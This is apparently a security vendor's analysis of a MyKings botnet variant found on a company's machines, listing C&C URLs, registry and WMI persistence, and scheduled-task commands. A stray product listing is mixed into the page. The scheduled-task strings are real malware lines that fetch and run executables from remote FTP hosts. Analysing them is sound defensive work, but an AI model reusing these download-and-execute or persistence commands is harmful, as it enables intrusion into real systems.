# Uncovering a MyKings Variant With Bootloader Persistence via Managed Detection and Response

#### For Samsung Galaxy A10e/A20/A50 Privacy Anti-Spy Tempered Glass Screen Protector

 $9.95End Date: Monday Mar-2-2020 17:19:18 PSTBuy It Now for only:$9.95Buy It Now | Add to watch list

#### For Samsung Galaxy A10e/A20/A50 Privacy Anti-Spy Tempered Glass Screen Protector

 $8.95End Date: Monday Mar-2-2020 17:19:18 PSTBuy It Now for only:$8.95Buy It Now | Add to watch list

by Miguel Ang, Erika Mendoza and Buddy Tancio

In May, during the Managed Detection and Response service on-boarding process of an electronics company in the Asia-Pacific region, we noticed suspicious activity via the Trend Micro Deep Discovery Inspector that turned out to be related to EternalBlue, an exploit perhaps more popularly known for being used in the WannaCry attacks. After the discovery, we sent our first alert to the company regarding the possible threat.

A few days later, we managed to find evidence of communication from one of the company’s machines to the following URLs (which we confirmed to be disease vectors):

• hxxp://js[.]mykings.top:280/v[.]sct
• hxxp://js[.]mykings.top:280/helloworld[.]msi

The URLs contained the word “mykings,” which was similar to the command-and-control (C&C) servers that were used in our previous analysis of the botnet in August 2017. This gave us the first clues as to what the threat was.

Furthermore, we found changes to the machine’s system registry that indicated they were being used as a persistence mechanism. These registry entries were responsible for the C&C callbacks to the URLs mentioned earlier:

• HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun” -Name “start”
• HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun” -Name “start1”
• HKLMSOFTWAREMicrosoftShared ToolsMSConfigstartupreg” -Name “start”
• HKLMSOFTWAREMicrosoftShared ToolsMSConfigstartupreg” -Name “start1”

Digging deeper, we found that the entries were added in 2017, indicating that the malware variant had been hiding in the company’s system for roughly 2 years before it was discovered. This presents an additional challenge since timing is important in determining MyKings’ actual payload. A large number of the botnet’s components, including references to the C&C server and the download URLs, are accessible online only for a short time and, therefore, are highly volatile. Unlike infections that start with embedded URLs and files, MyKings is tied together by scripts that simply download everything it needs from remote servers.

Figure 1. The registry entries that were added in 2017

During forensic investigation, we also identified several other persistence mechanisms consistent with our previous research in 2017. Aside from the autorun registries, we also observed scheduled tasks and Windows Management Instrumentation (WMI) objects (see Tables 1 and 2):

 Task Name Launch String Mysa cmd /c echo open down[.]mysking[.]info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe”} Mysa1 rundll32.exe c:\windows\debug\item.dat Mysa2 cmd /c echo open ftp[.]ftp0118[.]info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p”} Mysa3 cmd /c echo open ftp[.]ftp0118[.]info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe”} ok rundll32.exe c:\windows\debug\ok.dat

Table 1. Scheduled tasks and corresponding launch strings

 WMI Object Remarks __EventConsumerName : fuckyoumm2_consumer Code snippet for EventConsumer __EventFilterName:fuckyoumm2_filter Query: select * from __timerevent where timerid=”fuckyoumm2_itimer” __FilterToConsumerBinding __FilterToConsumerBinding.Consumer=”\\.\root\subscription:ActiveScriptEventConsumer.Name=”fuckyoumm2_consumer””,Filter=”\\.\root\subscription:__EventFilter.Name=”fuckyoumm2_filter””

Table 2. WMI objects and relevant details

Our analysis revealed that the variant retains its basic infrastructure. However, there were some interesting additions, which we discuss in detail in the technical analysis section.